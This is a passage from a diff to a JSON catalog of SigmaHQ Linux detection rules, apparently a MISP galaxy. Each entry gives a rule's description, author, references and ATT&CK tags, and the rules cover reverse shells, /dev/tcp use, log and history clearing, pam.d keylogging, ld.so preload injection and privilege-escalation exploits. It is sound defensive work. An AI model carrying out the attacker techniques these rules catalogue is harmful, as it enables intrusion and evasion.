"lnx_auditd_debugfs_usage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/0xm1rch/status/1600857731073654784?s=20&t=MdrBPqv4hnBEfAJBayMCZA", + "https://github.com/Neo23x0/auditd/blob/master/audit.rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_debugfs_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1006" + ] + }, + "uuid": "fb0647d7-371a-4553-8e20-33bbbe122956", + "value": "Use of Debugfs to Access a Raw Disk" + }, + { + "description": "Detects password policy discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community, Pawel Mazur", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_password_policy_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", + "https://man7.org/linux/man-pages/man1/passwd.1.html", + "https://attack.mitre.org/techniques/T1201/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", + "https://linux.die.net/man/1/chage", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ] + }, + "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", + "value": "Password Policy Discovery" + }, + { + "description": "Detects System Information Discovery commands", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/03", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_system_info_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + "https://attack.mitre.org/techniques/T1082/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", + "value": "System Information Discovery - Auditd" + }, + { + "description": "Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", + "meta": { + "author": "Peter Matkovski", + "creation_date": "2019/05/12", + "falsepositive": [ + "Admin or User activity" + ], + "filename": "lnx_auditd_alter_bash_profile.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "MITRE Attack technique T1156; .bash_profile and .bashrc. ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml" + ], + "tags": [ + "attack.s0003", + "attack.persistence", + "attack.t1546.004" + ] + }, + "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", + "value": "Edit of .bash_profile and .bashrc" + }, + { + "description": "Detects overwriting (effectively wiping/deleting) of a file.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/10/23", + "falsepositive": [ + "Appending null bytes to files.", + "Legitimate overwrite of files." 
+ ], + "filename": "lnx_auditd_dd_delete_file.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", + "value": "Overwriting the File with Dev Zero or Null" + }, + { + "description": "Detect attempt to enable auditing of TTY input", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/05/24", + "falsepositive": [ + "Administrative work" + ], + "filename": "lnx_auditd_keylogging_with_pam_d.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1003/", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", + "https://linux.die.net/man/8/pam_tty_audit", + "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1056.001" + ] + }, + "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", + "value": "Linux Keylogging with Pam.d" + }, + { + "description": "Detects relevant commands often related to malware or hacking activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/12/12", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_susp_cmds.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + 
"refs": [ + "Internal Research - mostly derived from exploit code including code in MSF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", + "value": "Suspicious Commands Linux" + }, + { + "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/06", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_hidden_files_directories.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1564/001/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", + "value": "Hidden Files and Directories" + }, + { + "description": "Detects the creation of a new user account. 
Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "meta": { + "author": "Marie Euler, Pawel Mazur", + "creation_date": "2020/05/18", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_create_account.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", + "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" + ], + "tags": [ + "attack.t1136.001", + "attack.persistence" + ] + }, + "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", + "value": "Creation Of An User Account" + }, + { + "description": "Detects suspicious command with /dev/tcp", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_dev_tcp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", + "https://book.hacktricks.xyz/shells/shells/linux", + "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" + ], + "tags": [ + "attack.reconnaissance" + ] + }, + "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", + "value": "Suspicious Use of /dev/tcp" + }, + { + "description": "Detects shellshock expressions in log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/14", + "falsepositive": [ + "Unknown" + ], + "filename": 
"lnx_shellshock.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", + "value": "Shellshock Expression" + }, + { + "description": "Detects the use of tools that copy files from or to remote systems", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/18", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_file_copy.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1105/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1105" + ] + }, + "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", + "value": "Remote File Copy" + }, + { + "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/09", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_apt_equationgroup_lnx.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" + ], + "tags": [ + "attack.execution", + "attack.g0020", + "attack.t1059.004" + ] + }, + "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", + "value": "Equation Group Indicators" + }, + { + "description": "Detects suspicious command lines that look as if they would create symbolic links to 
/etc/passwd", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/04/05", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_symlink_etc_passwd.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.qualys.com/2021/05/04/21nails/21nails.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" + ], + "tags": [ + "attack.t1204.001", + "attack.execution" + ] + }, + "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", + "value": "Symlink Etc Passwd" + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/09/10", + "falsepositive": [ + "Log rotation" + ], + "filename": "lnx_clear_syslog.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ] + }, + "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", + "value": "Commands to Clear or Remove the Syslog - Builtin" + }, + { + "description": "Detects buffer overflow attempts in Unix system log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_buffer_overflows.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" + ], + "tags": [ + "attack.t1068", + "attack.privilege_escalation" + ] + }, + "uuid": 
"18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", + "value": "Buffer Overflow Attempts" + }, + { + "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_rev_shells.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://alamot.github.io/reverse_shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", + "value": "Suspicious Reverse Shell Command Line" + }, + { + "description": "Detects suspicious log entries in Linux log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/25", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_log_entries.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", + "value": "Suspicious Log Entries" + }, + { + "description": "Detects the addition of a new user to a privileged group such as \"root\" or \"sudo\"", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/12/21", + "falsepositive": [ + "Administrative activity" + ], + "filename": "lnx_privileged_user_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://digital.nhs.uk/cyber-alerts/2018/cc-2825", + "https://linux.die.net/man/8/useradd", + 
"https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1098" + ] + }, + "uuid": "0ac15ec3-d24f-4246-aa2a-3077bb1cf90e", + "value": "Privileged User Has Been Created" + }, + { + "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/05/04", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Immersive-Labs-Sec/nimbuspwn", + "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", + "value": "Nimbuspwn Exploitation" + }, + { + "description": "Detects suspicious command sequence that JexBoss", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_jexboss.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", + "value": "JexBoss 
Command Sequence" + }, + { + "description": "Detects space after filename", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/17", + "falsepositive": [ + "Typos" + ], + "filename": "lnx_space_after_filename_.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", + "value": "Space After Filename" + }, + { + "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/05/05", + "falsepositive": [ + "Rare temporary workaround for library misconfiguration" + ], + "filename": "lnx_ldso_preload_injection.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://man7.org/linux/man-pages/man8/ld.so.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.006" + ] + }, + "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", + "value": "Code Injection by ld.so Preload" + }, + { + "description": "Detects suspicious shell commands used in various exploit codes (see references)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_commands.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://artkond.com/2017/03/23/pivoting-guide/", + 
"https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", + "http://pastebin.com/FtygZ1cg", + "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", + "value": "Suspicious Activity in Shell Commands" + }, + { + "description": "Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/05", + "falsepositive": [ + "Troubleshooting on Linux Machines" + ], + "filename": "lnx_shell_priv_esc_prep.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", + "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", + "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", + "value": "Privilege Escalation Preparation" + }, + { + "description": "Clear command history in linux which is used for defense evasion.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/03/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_clear_cmd_history.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", + "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", + "https://attack.mitre.org/techniques/T1070/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", + "value": "Clear Command History" + }, + { + "description": "Detects suspicious session with two users present", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_guacamole.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://research.checkpoint.com/2020/apache-guacamole-rce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/guacamole/lnx_susp_guacamole.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "1edd77db-0669-4fef-9598-165bda82826d", + "value": "Guacamole Two Users Sharing Session Anomaly" + }, + { + "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_vsftp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/dagwieers/vsftpd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/vsftpd/lnx_susp_vsftp.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", + "value": "Suspicious VSFTPD Error Messages" + }, + { + "description": "Detects relevant 
ClamAV messages", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_clamav.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/clamav/lnx_clamav.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.001" + ] + }, + "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", + "value": "Relevant ClamAV Message" + }, + { + "description": "Detects suspicious modification of crontab file.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/04/16", + "falsepositive": [ + "Legitimate modification of crontab" + ], + "filename": "lnx_crontab_file_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/cron/lnx_crontab_file_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", + "value": "Modifying Crontab" + }, + { + "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", + "meta": { + "author": "Sreeman", + "creation_date": "2022/01/26", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_pwnkit_local_privilege_escalation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/wdormann/status/1486161836961579020", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_pwnkit_local_privilege_escalation.yml" + ], + "tags": [ + 
"attack.privilege_escalation", + "attack.t1548.001" + ] + }, + "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", + "value": "PwnKit Local Privilege Escalation" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/16", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Workstations with frequently changing users" + ], + "filename": "lnx_susp_failed_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "fc947f8e-ea81-4b14-9a7b-13f888f94e18", + "value": "Failed Logins with Different Accounts from Single Source - Linux" + }, + { + "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_ssh_cve_2018_15473.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Rhynorater/CVE-2018-15473-Exploit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_ssh_cve_2018_15473.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1589" + ] + }, + "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", + "value": "SSHD Error Message CVE-2018-15473" + }, + { + "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/30", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_ssh.yml", + "level": "medium", + 
"logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", + "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_susp_ssh.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", + "value": "Suspicious OpenSSH Daemon Error" + }, + { + "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/28", + "falsepositive": [ + "Vulnerability scanners", + "Frequent attacks if system faces Internet" + ], + "filename": "modsec_mulitple_blocks.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/modsecurity/modsec_mulitple_blocks.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499" + ] + }, + "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", + "value": "Multiple Modsecurity Blocks" + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "lnx_sudo_cve_2019_14287_user.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml" + ], + "tags": [ + "attack.privilege_escalation", + 
"attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ] + }, + "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", + "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_security_tools_disabling_syslog.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_security_tools_disabling_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", + "value": "Disabling Security Tools - Builtin" + }, + { + "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/20", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_named.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_susp_named.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", + "value": "Suspicious Named Error" + }, + { + "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat 
Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Any legitimate cron file." + ], + "filename": "file_event_lnx_persistence_cron_files.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "linux", + "refs": [ + "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", + "value": "Persistence Via Cron Files" + }, + { + "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Creation of legitimate files in sudoers.d folder part of administrator work" + ], + "filename": "file_event_lnx_persistence_sudoers_files.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", + "value": "Persistence Via Sudoers Files" + }, + { + "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit 